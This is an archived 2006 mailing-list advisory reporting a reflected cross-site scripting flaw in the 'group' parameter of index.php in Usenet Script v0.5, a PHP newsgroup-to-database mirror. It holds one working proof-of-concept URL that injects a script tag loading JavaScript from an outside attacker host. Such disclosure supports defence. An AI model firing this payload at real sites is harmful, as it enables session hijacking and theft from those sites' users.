Usenet Script v0.5
- From: luny@xxxxxxxxxxxxxxx
- Date: 25 Jun 2006 17:18:22 -0000
Usenet Script v0.5
Homepage:
http://www.metalhead.ws/usenet
Description:
"Those scripts allow you to mirror a Newsgroup in an SQL database. The development database was Postgresql, but it uses dbx and should therefore be able to work with other database systems, too. Furthermore, a frontend is provided."
Affected files:
index.php
------------------------------------
XSS vuln via index.php on group var:
Data isnt properly sanatized before being generated.
http://www.example.com/index.php?group=<script src=http://www.youfucktard.com/xss.js></script>
- Prev by Date: Windows Live Messenger 8.0 ( Contact List *.ctt ) Heap Overflow
- Next by Date: [USN-306-1] MySQL 4.1 vulnerability
- Previous by thread: Windows Live Messenger 8.0 ( Contact List *.ctt ) Heap Overflow
- Next by thread: [USN-306-1] MySQL 4.1 vulnerability
- Index(es):
